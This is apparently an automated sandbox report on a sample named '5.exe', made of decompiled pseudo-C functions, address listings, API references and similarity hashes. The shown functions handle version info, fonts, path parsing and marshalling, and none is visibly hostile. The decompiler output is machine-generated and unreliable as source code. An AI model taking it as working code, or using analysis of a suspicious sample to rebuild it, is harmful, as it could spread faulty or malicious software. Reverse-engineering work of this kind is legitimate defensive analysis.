                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                              • String ID:
                                                                                              • API String ID: 3058430110-0
                                                                                              • Opcode ID: 266193da64e6529cb1dbe4168aa8dd00d875465f4f8024536fa94fd6042959ba
                                                                                              • Instruction ID: 1b0ae90171ebab7857d9dba44f5ddbf46180901a5461698aae47371ca5ab04b5
                                                                                              • Opcode Fuzzy Hash: 266193da64e6529cb1dbe4168aa8dd00d875465f4f8024536fa94fd6042959ba
                                                                                              • Instruction Fuzzy Hash: B831A130604B46AFEB118F75CC44BAA7BB5FF613A0F15456AE8748B192E730F861DB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401EC5, Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 85%
                                                                                              			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029E8(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E00405889(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E00405889(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}






                                                                                              0x00401ec7
                                                                                              0x00401ecf
                                                                                              0x00401ed4
                                                                                              0x00401ed9
                                                                                              0x00401edd
                                                                                              0x00401ee0
                                                                                              0x00401ee2
                                                                                              0x00401ee9
                                                                                              0x00401ef2
                                                                                              0x00401efa
                                                                                              0x00401efd
                                                                                              0x00401f12
                                                                                              0x00401f18
                                                                                              0x00401f2b
                                                                                              0x00401f34
                                                                                              0x00401f40
                                                                                              0x00401f45
                                                                                              0x00401f45
                                                                                              0x00401f2b
                                                                                              0x00401f48
                                                                                              0x00401b75
                                                                                              0x00401b75
                                                                                              0x00401efd
                                                                                              0x00402880
                                                                                              0x0040288c

                                                                                              APIs
                                                                                              • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                                                                                              • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                                                                                              • VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24
                                                                                                • Part of subcall function 00405889: wsprintfA.USER32 ref: 00405896
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 1404258612-0
                                                                                              • Opcode ID: 96c576a8d7c40e70efe5b4beeaa819c74075c8ca6966c6621d7a9c446a88aaa4
                                                                                              • Instruction ID: 5df6cf6993c09150fb4e954c2a2c9de352bdee8941cce83e0996c7e852039ca5
                                                                                              • Opcode Fuzzy Hash: 96c576a8d7c40e70efe5b4beeaa819c74075c8ca6966c6621d7a9c446a88aaa4
                                                                                              • Instruction Fuzzy Hash: 56111C72900108BEDB01EFA5DD45DAEBBB9EF04344B20807AF501F61E1D7789A54DB28
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1E1E8C, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E6F1E1E8C(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E6F1E23DD(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E6F1E1F12(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E6F1E2658(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E6F1E2597(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                                                                                              0x6f1e1e8f
                                                                                              0x6f1e1e95
                                                                                              0x6f1e1f08
                                                                                              0x00000000
                                                                                              0x6f1e1e9c
                                                                                              0x6f1e1e9c
                                                                                              0x6f1e1e9f
                                                                                              0x6f1e1eba
                                                                                              0x6f1e1ebd
                                                                                              0x6f1e1edd
                                                                                              0x6f1e1eef
                                                                                              0x6f1e1ebf
                                                                                              0x6f1e1ebf
                                                                                              0x6f1e1ec2
                                                                                              0x00000000
                                                                                              0x6f1e1ec4
                                                                                              0x6f1e1ed6
                                                                                              0x6f1e1ed6
                                                                                              0x6f1e1ec2
                                                                                              0x6f1e1f0d
                                                                                              0x6f1e1f11
                                                                                              0x6f1e1ea1
                                                                                              0x6f1e1eb9
                                                                                              0x6f1e1eb9
                                                                                              0x6f1e1e9f

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                              • String ID:
                                                                                              • API String ID: 3016257755-0
                                                                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                              • Instruction ID: 9dc7bc799d241c03bb9962e93e3e60d046b0631a7b2237fa3cf4265b0b79cad7
                                                                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                              • Instruction Fuzzy Hash: 3F01363244058EBBCF125F94DC11CEE3F62BB2D395B458915FE6868460D336E5B1AB81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004054B2, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004054B2(char _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t1 =  &_a4; // 0x405264
				_t8 =  *_t1;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E00405449(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}








                                                                                              0x004054bb
                                                                                              0x004054bb
                                                                                              0x004054c2
                                                                                              0x004054c5
                                                                                              0x004054ca
                                                                                              0x004054dd
                                                                                              0x004054f7
                                                                                              0x00000000
                                                                                              0x004054f7
                                                                                              0x004054e1
                                                                                              0x004054e2
                                                                                              0x004054e5
                                                                                              0x004054e6
                                                                                              0x004054ee
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004054f0
                                                                                              0x004054f3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004054f3
                                                                                              0x00000000
                                                                                              0x004054d3
                                                                                              0x00000000
                                                                                              0x004054d4

                                                                                              APIs
                                                                                              • CharNextA.USER32(dR@,?,0042B3E0,00000000,00405516,0042B3E0,0042B3E0,?,?,00000000,00405264,?,"C:\Users\user\Desktop\5.exe" ,00000000), ref: 004054C0
                                                                                              • CharNextA.USER32(00000000), ref: 004054C5
                                                                                              • CharNextA.USER32(00000000), ref: 004054D4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: CharNext
                                                                                              • String ID: dR@
                                                                                              • API String ID: 3213498283-1322173608
                                                                                              • Opcode ID: e3875c486b2c61f66053de752efbb5dda379102a37ce04da83dd8a0f358ee579
                                                                                              • Instruction ID: ba3132894351e94c97711127f452fc04d7c27ede8e93237e74fa5b384ede3bcd
                                                                                              • Opcode Fuzzy Hash: e3875c486b2c61f66053de752efbb5dda379102a37ce04da83dd8a0f358ee579
                                                                                              • Instruction Fuzzy Hash: AAF0A751944B2165E73222AC5C44BFB6B9CDB55712F144437E600B61D186BC5CC29FBA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401D1B, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 67%
                                                                                              			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af7c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
				 *0x40af8c = E004029CB(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af93 = 1;
				 *0x40af90 = _t11 & 0x00000001;
				 *0x40af91 = _t11 & 0x00000002;
				 *0x40af92 = _t11 & 0x00000004;
				E0040594D(_t18, _t24, _t26, 0x40af98,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af7c);
				_push(_t14);
				_push(_t26);
				E00405889();
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                                                                              0x00401d29
                                                                                              0x00401d42
                                                                                              0x00401d4c
                                                                                              0x00401d51
                                                                                              0x00401d5c
                                                                                              0x00401d63
                                                                                              0x00401d75
                                                                                              0x00401d7b
                                                                                              0x00401d80
                                                                                              0x00401d8a
                                                                                              0x004024aa
                                                                                              0x00401561
                                                                                              0x00402825
                                                                                              0x00402880
                                                                                              0x0040288c

                                                                                              APIs
                                                                                              • GetDC.USER32(?), ref: 00401D22
                                                                                              • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                                                                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                                                                              • CreateFontIndirectA.GDI32(0040AF7C), ref: 00401D8A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: CapsCreateDeviceFontIndirect
                                                                                              • String ID:
                                                                                              • API String ID: 3272661963-0
                                                                                              • Opcode ID: 779dcb5e768c393210178d78652cdd2675fce9384f1858524c3e2c616e5ac7a8
                                                                                              • Instruction ID: 88b098f1539f08df6dee2951bb44ee62bc7572b1891c100f3a3d81e12d825a95
                                                                                              • Opcode Fuzzy Hash: 779dcb5e768c393210178d78652cdd2675fce9384f1858524c3e2c616e5ac7a8
                                                                                              • Instruction Fuzzy Hash: 5EF04FF1A48741AEE7029770AE1BB9A3B64A715309F104939F142BA1E2C6BC04158B3F
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1D5070, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 181COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 53%
                                                                                              			E6F1D5070(void* __eflags, int _a4, intOrPtr _a8, signed short* _a12) {
				signed char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _t121;
				intOrPtr _t123;
				intOrPtr _t129;
				intOrPtr _t166;
				void* _t204;
				void* _t206;

				_v8 = 0;
				_v16 = 0;
				_v44 =  *((intOrPtr*)(_a4 + 0x1c));
				_v32 = 0;
				_v24 = 0;
				_v20 = 0;
				_v28 = 0;
				0x6f1d0000("(%p,%p,%p)\n", _a4, _a8, _a12);
				E6F1D73B0(_a4 + 0x14, ( *(_a12 + (1 << 0)) & 0x000000ff) + 1);
				_t206 = _t204 + 0x18;
				if( *((intOrPtr*)(_a4 + 0x30)) == 0) {
					_t166 = _a4;
					_t212 =  *((intOrPtr*)(_t166 + 0x6c));
					if( *((intOrPtr*)(_t166 + 0x6c)) == 0) {
						_v36 =  *((intOrPtr*)(_a4 + 0x30));
						_v12 =  *((intOrPtr*)(_a4 + 0x14));
						 *((intOrPtr*)(_a4 + 0x30)) = 1;
						E6F1D5070(_t212, _a4, _a8, _a12);
						 *((intOrPtr*)(_a4 + 0x30)) = _v36;
						 *((intOrPtr*)(_a4 + 0x6c)) =  *((intOrPtr*)(_a4 + 0x14));
						_v32 = 1;
						0x6f1d0000("difference = 0x%x\n",  *((intOrPtr*)(_a4 + 0x6c)) - _v12);
						_t206 = _t206 + 8;
						 *((intOrPtr*)(_a4 + 0x14)) = _v12;
					}
				}
				_a12 =  &(_a12[2]);
				if( *_a12 != 0) {
					_v8 = _a12 +  *_a12;
				}
				_a12 =  &(_a12[1]);
				if(( *_a12 & 0x0000ffff) != 0) {
					_v16 = _a12 + ( *_a12 & 0x0000ffff);
				}
				_a12 =  &(_a12[1]);
				 *((intOrPtr*)(_a4 + 0x1c)) = _a8;
				if(_v8 != 0) {
					_t129 = _a4;
					0x6f1d0000(_t129, _a12);
					_v40 = _t129;
					E6F1DCC40( *_v8 & 0x000000ff, _a4, _a8 + _v40, _v8);
					_t206 = _t206 + 0x18;
					_v20 =  *((intOrPtr*)(_a4 + 0x3c));
					_v24 =  *((intOrPtr*)(_a4 + 0x44));
					_v28 =  *((intOrPtr*)(_a4 + 0x40));
				}
				_t121 = E6F1D8B40(_a4, _a8, _a12, _v16);
				_a8 = _t121;
				if(_v8 != 0) {
					 *((intOrPtr*)(_a4 + 0x3c)) = _v20;
					 *((intOrPtr*)(_a4 + 0x44)) = _v24;
					 *((intOrPtr*)(_a4 + 0x40)) = _v28;
					_t121 = E6F1DCE70( *_v8 & 0x000000ff, _a4, _a8, _v8, 1);
				}
				 *((intOrPtr*)(_a4 + 0x1c)) = _v44;
				if(_v32 == 0) {
					return _t121;
				} else {
					 *((intOrPtr*)(_a4 + 0x14)) =  *((intOrPtr*)(_a4 + 0x6c));
					_t123 = _a4;
					 *((intOrPtr*)(_t123 + 0x6c)) = 0;
					return _t123;
				}
			}



















                                                                                              0x6f1d5076
                                                                                              0x6f1d507d
                                                                                              0x6f1d508a
                                                                                              0x6f1d508d
                                                                                              0x6f1d5094
                                                                                              0x6f1d509b
                                                                                              0x6f1d50a2
                                                                                              0x6f1d50ba
                                                                                              0x6f1d50dc
                                                                                              0x6f1d50e1
                                                                                              0x6f1d50eb
                                                                                              0x6f1d50ed
                                                                                              0x6f1d50f0
                                                                                              0x6f1d50f4
                                                                                              0x6f1d50fc
                                                                                              0x6f1d5105
                                                                                              0x6f1d510b
                                                                                              0x6f1d511e
                                                                                              0x6f1d5129
                                                                                              0x6f1d5135
                                                                                              0x6f1d5138
                                                                                              0x6f1d514e
                                                                                              0x6f1d5153
                                                                                              0x6f1d515c
                                                                                              0x6f1d515c
                                                                                              0x6f1d50f4
                                                                                              0x6f1d5165
                                                                                              0x6f1d5170
                                                                                              0x6f1d517b
                                                                                              0x6f1d517b
                                                                                              0x6f1d5184
                                                                                              0x6f1d518f
                                                                                              0x6f1d519a
                                                                                              0x6f1d519a
                                                                                              0x6f1d51a3
                                                                                              0x6f1d51ac
                                                                                              0x6f1d51b3
                                                                                              0x6f1d51b9
                                                                                              0x6f1d51bd
                                                                                              0x6f1d51c5
                                                                                              0x6f1d51e7
                                                                                              0x6f1d51ec
                                                                                              0x6f1d51f5
                                                                                              0x6f1d51fe
                                                                                              0x6f1d5207
                                                                                              0x6f1d5207
                                                                                              0x6f1d521a
                                                                                              0x6f1d5222
                                                                                              0x6f1d5229
                                                                                              0x6f1d5231
                                                                                              0x6f1d523a
                                                                                              0x6f1d5243
                                                                                              0x6f1d5264
                                                                                              0x6f1d5269
                                                                                              0x6f1d5272
                                                                                              0x6f1d5279
                                                                                              0x6f1d5294
                                                                                              0x6f1d527b
                                                                                              0x6f1d5284
                                                                                              0x6f1d5287
                                                                                              0x6f1d528a
                                                                                              0x00000000
                                                                                              0x6f1d528a

                                                                                              APIs
                                                                                              • _NdrComplexStructBufferSize@12.RGSBZEOG(00000000,00000000,00000000), ref: 6F1D511E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: BufferComplexSize@12Struct
                                                                                              • String ID: (%p,%p,%p)$difference = 0x%x
                                                                                              • API String ID: 1319815426-1308788287
                                                                                              • Opcode ID: 9513c4d5056cd174a8b54ae7318da83859a6cb3a00a73bea5f4b9a4b33ab83c3
                                                                                              • Instruction ID: bd4b52f81162a8df8462198767ff0c53216f6e1156bb1c8555b8d6c55845cc29
                                                                                              • Opcode Fuzzy Hash: 9513c4d5056cd174a8b54ae7318da83859a6cb3a00a73bea5f4b9a4b33ab83c3
                                                                                              • Instruction Fuzzy Hash: F981D6B4A00209EFDB08CF59C890AAE7BB5FF88354F108559F8199B345D735EA51CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1D3FC0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 172COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 62%
                                                                                              			E6F1D3FC0(intOrPtr _a4, intOrPtr* _a8, signed char* _a12, signed int _a16) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _t96;
				intOrPtr _t110;
				void* _t172;
				void* _t173;
				void* _t176;

				0x6f1d0000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				_t173 = _t172 + 0x14;
				if(( *_a12 & 0x000000ff) == 0x1f || ( *_a12 & 0x000000ff) == 0x20) {
					_v5 = (_a12[1] & 0x000000ff) + 1;
					if(( *_a12 & 0x000000ff) != 0x1f) {
						_a12 =  &(_a12[2]);
						_v16 =  *_a12;
						_a12 =  &(_a12[4]);
						_v12 =  *_a12;
						_a12 =  &(_a12[4]);
					} else {
						_a12 =  &(_a12[2]);
						_v16 =  *_a12 & 0x0000ffff;
						_a12 =  &(_a12[2]);
						_v12 =  *_a12 & 0x0000ffff;
						_a12 =  &(_a12[2]);
					}
					_v28 =  *_a12 & 0x0000ffff;
					_a12 =  &(_a12[2]);
					_a12 = E6F1DA540(_v12, _a4, _a12, _v12);
					E6F1D73D0(_v5 & 0x000000ff, _a4 + 4, _v5 & 0x000000ff);
					_t96 = E6F1DAEC0(_v28,  *((intOrPtr*)(_a4 + 0x44)));
					_t176 = _t173 + 0x1c;
					_v20 = _t96;
					_v32 =  *((intOrPtr*)(_a4 + 0x40));
					if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
						_a16 = 1;
					}
					_t133 = _a16 & 0x000000ff;
					if((_a16 & 0x000000ff) != 0) {
						_t110 = E6F1DA3B0(_t133, _a4, _v16);
						_t176 = _t176 + 8;
						 *_a8 = _t110;
					}
					 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
					_v24 =  *((intOrPtr*)(_a4 + 0x10));
					E6F1DAF00(_a4, _v20);
					E6F1DC2B0(_a4, _v24,  *_a8, _a12, _a16 & 0x000000ff);
					E6F1E00E0( *_a8 + _v32, _v24, _v20);
					return 0;
				} else {
					0x6f1d0000("invalid format type %x\n",  *_a12 & 0x000000ff);
					 *0x6f1d0000(0x6e6);
					return 0;
				}
			}















                                                                                              0x6f1d3fdc
                                                                                              0x6f1d3fe1
                                                                                              0x6f1d3ff6
                                                                                              0x6f1d404d
                                                                                              0x6f1d4062
                                                                                              0x6f1d4099
                                                                                              0x6f1d40a1
                                                                                              0x6f1d40aa
                                                                                              0x6f1d40b2
                                                                                              0x6f1d40bb
                                                                                              0x6f1d4064
                                                                                              0x6f1d406a
                                                                                              0x6f1d4073
                                                                                              0x6f1d407c
                                                                                              0x6f1d4085
                                                                                              0x6f1d408e
                                                                                              0x6f1d408e
                                                                                              0x6f1d40c4
                                                                                              0x6f1d40cd
                                                                                              0x6f1d40e4
                                                                                              0x6f1d40f3
                                                                                              0x6f1d4106
                                                                                              0x6f1d410b
                                                                                              0x6f1d410e
                                                                                              0x6f1d4117
                                                                                              0x6f1d4120
                                                                                              0x6f1d412a
                                                                                              0x6f1d412a
                                                                                              0x6f1d412e
                                                                                              0x6f1d4134
                                                                                              0x6f1d413e
                                                                                              0x6f1d4143
                                                                                              0x6f1d4149
                                                                                              0x6f1d4149
                                                                                              0x6f1d4154
                                                                                              0x6f1d415d
                                                                                              0x6f1d4168
                                                                                              0x6f1d4187
                                                                                              0x6f1d41a0
                                                                                              0x00000000
                                                                                              0x6f1d400c
                                                                                              0x6f1d4021
                                                                                              0x6f1d402e
                                                                                              0x00000000
                                                                                              0x6f1d4034

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: (%p, %p, %p, %d)$invalid format type %x
                                                                                              • API String ID: 4104443479-658257468
                                                                                              • Opcode ID: e870aec31d8424ae788882f3134c0ae2cabc59b7f851ad83a53327fa5bac8b49
                                                                                              • Instruction ID: e9ff8b554b0ffc11dfc2539802c0ed4451d5b49fe9e0262fb41bff38fb035b33
                                                                                              • Opcode Fuzzy Hash: e870aec31d8424ae788882f3134c0ae2cabc59b7f851ad83a53327fa5bac8b49
                                                                                              • Instruction Fuzzy Hash: 566180B5A043499FCB08CF58C890AAF7BB6FF89344F048559F9198B345D731EA61CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1D5640, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 110COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 37%
                                                                                              			E6F1D5640(int _a4, WCHAR* _a8, signed char* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t72;
				intOrPtr _t73;

				_v8 = 0;
				0x6f1d0000("(%p,%p,%p)\n", _a4, _a8, _a12);
				if(( *_a12 & 0x000000ff) != 0x21) {
					0x6f1d0000("invalid format type %x\n",  *_a12 & 0x000000ff);
					return  *0x6f1d0000(0x6e6);
				}
				if( *((intOrPtr*)(_a4 + 0x30)) == 0 &&  *((intOrPtr*)(_a4 + 0x6c)) == 0) {
					_v12 =  *((intOrPtr*)(_a4 + 0x30));
					_v28 =  *((intOrPtr*)(_a4 + 0x14));
					_v24 =  *((intOrPtr*)(_a4 + 0x3c));
					_v20 =  *((intOrPtr*)(_a4 + 0x40));
					_v16 =  *((intOrPtr*)(_a4 + 0x44));
					 *((intOrPtr*)(_a4 + 0x30)) = 1;
					E6F1D5640(_a4, _a8, _a12);
					 *((intOrPtr*)(_a4 + 0x30)) = _v12;
					 *((intOrPtr*)(_a4 + 0x6c)) =  *((intOrPtr*)(_a4 + 0x14));
					_v8 = 1;
					 *((intOrPtr*)(_a4 + 0x44)) = _v16;
					 *((intOrPtr*)(_a4 + 0x40)) = _v20;
					 *((intOrPtr*)(_a4 + 0x3c)) = _v24;
					 *((intOrPtr*)(_a4 + 0x14)) = _v28;
				}
				E6F1DCC40(0x21, _a4, _a8, _a12);
				_t72 = E6F1DCE70(0x21, _a4, _a8, _a12, 1);
				if(_v8 != 0) {
					_t73 =  *((intOrPtr*)(_a4 + 0x6c));
					 *((intOrPtr*)(_a4 + 0x14)) = _t73;
					 *((intOrPtr*)(_a4 + 0x6c)) = 0;
					return _t73;
				}
				return _t72;
			}











                                                                                              0x6f1d5646
                                                                                              0x6f1d565e
                                                                                              0x6f1d5678
                                                                                              0x6f1d568f
                                                                                              0x00000000
                                                                                              0x6f1d569c
                                                                                              0x6f1d56ae
                                                                                              0x6f1d56c7
                                                                                              0x6f1d56d0
                                                                                              0x6f1d56d9
                                                                                              0x6f1d56e2
                                                                                              0x6f1d56eb
                                                                                              0x6f1d56f1
                                                                                              0x6f1d5704
                                                                                              0x6f1d570f
                                                                                              0x6f1d571b
                                                                                              0x6f1d571e
                                                                                              0x6f1d572b
                                                                                              0x6f1d5734
                                                                                              0x6f1d573d
                                                                                              0x6f1d5746
                                                                                              0x6f1d5746
